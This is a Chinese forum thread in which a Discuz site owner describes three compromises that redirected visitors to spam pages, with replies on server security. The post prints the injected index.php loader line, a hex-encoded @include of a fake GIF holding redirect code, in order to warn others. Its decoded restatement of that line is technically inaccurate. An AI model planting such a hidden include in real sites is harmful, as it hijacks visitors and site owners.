记录这一年来自己论坛被黑 跳转垃圾网页的问题
DZ论坛现在已经是高危的程序<br />这可能跟多年不更新有关系,从来没有哪个时候像今年一样反复被黑!<br />目前已经开启了 ESET杀毒软件,希望不会了<br /><br />在此写下三次论坛网页被修改的样式,以备大家参考!<br /><br />这三次被黑,表现都是访问网页会跳转到垃圾页面,但是都很隐蔽,有的会偶尔弹出,有的会选择只在手机端弹出等等!<br /><br /><font color="#ff0000">1. config/config_global.php 被篡改</font><br />在 config_global.php 文件底部会出现一些超长的不正常代码,对比一下正版文件就可以发现异常<br /><br /><font color="#ff0000">2..htaccess 文件被篡改</font>, 因为已经被删除,记不得添加了哪两句,自行对比下<br /><br />3.前几天的发生的, <font color="#ff0000">INDEX.PHP 被篡改。</font><br /><ol><li>@include(PACK('H*','2e2f7374617469632f696d6167652f636f6d6d6f6e2f6e6f696d672e676966'));</ol><br />经过查询,是执行一个<br /><br /><ol><li>@include(PACK('H*','./static/image/common/noimg.gif'));</ol><br />经过查询,noimg.gif根本不是图片,里边存有跳转代码。<br /><br />多事之秋,各种病毒泛滥,对于DZ这个老程序真是千疮百孔,把这些分享给大家。因为就算你杀了毒,不找出被篡改的文件,也是枉然!<br /><br /><br />篡改<em>, </em>文件<em>, </em>论坛<em>, </em>已经<em>, </em>网页 想转WP了,昨晚看了一晚上的主题先收藏起来,到时候移过来 好像也没错哦,HTML5在国外已经被大量网站使用了,看了下discuz内部代码,居然没有跟进,的确慢慢的就落后了 牛逼网站时常被人掂记,我的网站5 6年都没人来黑。 文件被修改基本都是服务器本身安全没做好,而非DZ被黑,加强服务器安全防止被入侵是关键,不然任何程序都会被黑的 服务器没有做好安全。 <br />我赞同你的说法,discuz安全性我也测试过,99%的攻击方法都没什么用,他的这个应该是FTP密码被别人知道了,然后被上传木马文件,他不彻底清除恶意代码的话,就只能重装了 楼主用哪里的服务器建站? 说的我怕怕的
頁:
[1]